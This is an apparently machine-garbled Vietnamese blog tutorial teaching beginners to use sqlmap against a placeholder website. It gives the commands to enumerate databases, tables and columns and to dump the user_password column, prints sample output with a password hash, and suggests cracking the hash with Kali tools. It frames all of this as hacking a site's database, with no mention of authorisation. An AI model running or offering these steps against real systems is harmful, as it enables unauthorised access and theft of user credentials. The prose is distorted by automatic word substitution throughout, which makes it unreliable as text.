SQL map là 1 trong những biện pháp có ích đến begginer tham mê gia thử tấn công những web .Sau đây bản thân xin phân tách vẫn bí quyết thực hiện qui định này .

Bạn đang xem: Sqlmap là gì

Trước hết chúng ta chuẩn bị cho bạn một liên kết web làm sao đó bao gồm lỗi Squốc lộ injection.


Chạy lệnh cmd

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/thành quả.cgi?item_id=15 --dbs

Ở đây:sqlmaps = Tên của tệp nhị phân sqlmap-u = URL kim chỉ nam (ví dụ: “http://www.sqldummywebsite.com/cgi-bin/cửa nhà.cgi?item_id=15”)–dbs = Liệt kê cơ sở tài liệu DBMS


*

Lệnh này cho thấy một vài ban bố thú vị:

công nghệ áp dụng web: ApacheDBMS back-end: MySquốc lộ 5.0<10:55:53> vẫn truy hỏi xuất: information_schema<10:55:56> được truy nã xuất: sqldummywebsite<10:55:56> đang tìm hấp thụ tài liệu được ghi vào tệp văn uống bản vào "/usr/share/sqlmap/output/www.sqldummywebsite.com"

 

Bây giờ đồng hồ chúng ta gồm nhì cửa hàng tài liệu mà bạn có thể chú ý. information_schema là 1 các đại lý dữ liệu tiêu chuẩn chỉnh đến phần lớn hầu hết cửa hàng dữ liệu MYSquốc lộ. Vì vậy, sự quyên tâm của họ đang là bên trên đại lý dữ liệu sqldummywebsite.

Liệt kê các bảng cơ sở tài liệu đích bằng cách thực hiện SQLMAP Squốc lộ Injection

Bây giờ bọn họ cần biết có bao nhiêu bảng cơ mà các đại lý tài liệu sqldummywebsite này nhận ra với thương hiệu của chúng là gì. Để tìm hiểu biết tin đó, sử dụng lệnh sau:


sqlmaps -u http://www.sqldummywebsite.com/cgi-bin/tác phẩm.cgi?item_id=15 -D sqldummywebsite --tables

tin tức được cơ sở tài liệu này còn có 8 bảng.

<10:56:20> fetching tables for database: "sqldummywebsite"<10:56:22> heuristics detected website page charphối "ISO-8859-2"<10:56:22> the Squốc lộ query used returns 8 entries<10:56:25> retrieved: item<10:56:27> retrieved: link<10:56:30> retrieved: other<10:56:32> retrieved: picture<10:56:34> retrieved: picture_tag<10:56:37> retrieved: popular_picture<10:56:39> retrieved: popular_tag<10:56:42> retrieved: user_info

 

*

 Liệt kê những cột trên bảng đích của đại lý dữ liệu sẽ lựa chọn bằng phương pháp áp dụng SQLMAPhường Squốc lộ Injection

Bây giờ bọn họ nên liệt kê toàn bộ những cột trong bảng kim chỉ nam user_info của đại lý dữ liệu sqldummytrang web bằng cách sử dụng SQLMAPhường SQL Injection. SQLMAPhường Squốc lộ Injection tạo cho nó thực thụ thuận lợi, chạy lệnh sau:

sqlmaps -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummytrang web -T user_info --columns

 

Vấn đề này trả về 5 mục từ bảng kim chỉ nam user_info của đại lý tài liệu sqldummytrang web.

Xem thêm: " Người Lập Phiếu Thu Tiếng Anh Là Gì ? Phiếu Thu, Phiếu Chi

<10:57:16> tìm kiếm nạp các cột cho bảng "user_info" vào đại lý tài liệu "sqldummywebsite" <10:57:18> heuristics sẽ phát hiện nay cỗ cam kết từ trang web "ISO-8859-2" <10:57:18 > tầm nã vấn Squốc lộ được sử dụng trả về 5 mục <10:57:20> được tầm nã xuất: user_id <10:57:22> sẽ tầm nã xuất: int (10) unsigned <10:57:25> được truy hỏi xuất: user_login <10:57:27> được truy hỏi xuất: varchar (45) <10:57:32> được truy tìm xuất: user_password <10:57:34> được truy tìm xuất: varchar (255) < 10:57:37> được truy xuất: unique_id <10:57:39> được truy hỏi xuất: varchar (255) <10:57:41> được tầm nã xuất: record_status <10:57:43> được tróc nã xuất: tinyint (4)

Đây và đúng là các gì họ vẫn tra cứu kiếm … mục tiêu user_login cùng user_password.

*

Trích xuất password trường đoản cú những cột mục tiêu của bảng đích của cửa hàng dữ liệu được chọn bằng cách thực hiện SQLMAP.. SQL Injection

Sử dụng lệnh sau nhằm trích xuất password cho người sử dụng.

sqlmap -u http://www.sqldummytrang web.com/cgi-bin/sản phẩm.cgi?item_id=15 -D sqldummytrang web -T user_info -C user_password --dump

 


Và đó là password . Nhưng nó đã có được mã hóa . quý khách hàng yêu cầu một tool giải mã nó (tool crack pass bên trên Kali Linux gồm thêm mang lại lợi ích mang lại bạn) .

<10:59:15> tầm nã vấn SQL được sử dụng trả về 1 mục <10:59:17> được truy nã xuất: 24iYBc17xK0e. <10:59:18> phân tích kết xuất bảng cho những băm mật khẩu đăng nhập hoàn toàn có thể gồm Trung tâm dữ liệu: sqldummytrang web Bảng: user_info <1 mục> + --------------- + | user_password | + --------------- + | 24iYBc17xK0e. | + --------------- +

 

Bởi vậy bọn họ sẽ haông xã được một website database như thế nào đó bởi Squốc lộ injection thực hiện nguyên tắc SQL maps . Cảm ơn chúng ta sẽ đón xem .

Bài viết liên quan

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *